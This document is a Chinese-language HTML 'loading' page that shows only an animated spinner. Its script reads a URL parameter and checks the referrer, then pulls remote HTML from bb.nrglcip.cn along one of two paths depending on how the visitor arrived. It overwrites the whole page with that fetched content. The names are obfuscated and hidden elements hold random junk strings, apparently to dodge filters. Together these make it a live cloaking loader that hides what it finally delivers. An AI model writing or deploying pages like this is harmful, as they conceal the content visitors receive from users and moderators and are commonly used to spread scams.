<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kn2VU9c8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kn2VU9c8 .S97XIqa {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kn2VU9c8 .content {
            line-height: 50px;
            text-align: center
        }

        .kn2VU9c8 .img {
            width: 100%
        }

        .kn2VU9c8 .piin0gb {
            text-align: center
        }

        .kn2VU9c8 .piin0gb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kn2VU9c8 .piin0gb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kn2VU9c8 .piin0gb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kn2VU9c8 .piin0gb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kn2VU9c8 .piin0gb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kn2VU9c8 .piin0gb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kn2VU9c8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YMc7mrVbi5r6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Oyrwcym = YMc7mrVbi5r6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Oyrwcym +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Oyrwcym +".html?a=share";
		}
		
        doTa5wVlxJ=url+"#"+new Date().getTime();
        doTa5wVlxJ && function() {
            $.get(doTa5wVlxJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>gmrZcK4uTUMFLlDBGZGvWcY84Jq9Etb6LvIGJ</a>
<img  src='' style='display:none'>
<div style='display:none'>LvJALkFUn7RlWT5Ciy</div>
<a  href='#' style='display:none'>gmrZcK4uTUMFLlDBGZGvWcY84Jq9Etb6LvIGJ</a>
<b style='display:none' >GONEA9a56Xplai62b0zxiVsEOwrAtx66sUf</b><div class="kn2VU9c8">
    <div class="S97XIqa">
        <div class="piin0gb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >KRPffYIDazEB</ul>
<img  src='' style='display:none'>
<span style='display:none'>IjrN6fb6dL1OoxcrK6rdbp5k3zqm9TfB0Ro8fwjm4AmQjV4bdo</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >KRPffYIDazEB</ul>
<b style='display:none' >UL7ka8ZiBoPDkXo</b>
<a  href='#' style='display:none'>wk24AhjF7zXiQRMFRyxD0cVQm</a></body>
</html>